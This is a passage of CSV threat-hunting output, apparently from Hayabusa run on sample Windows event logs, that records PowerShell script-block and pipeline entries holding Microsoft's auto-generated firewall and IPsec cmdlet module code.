'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query 
(cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { 
[object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.472 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.473 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.473 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.473 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 
+00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent 
= $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = 
$myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} 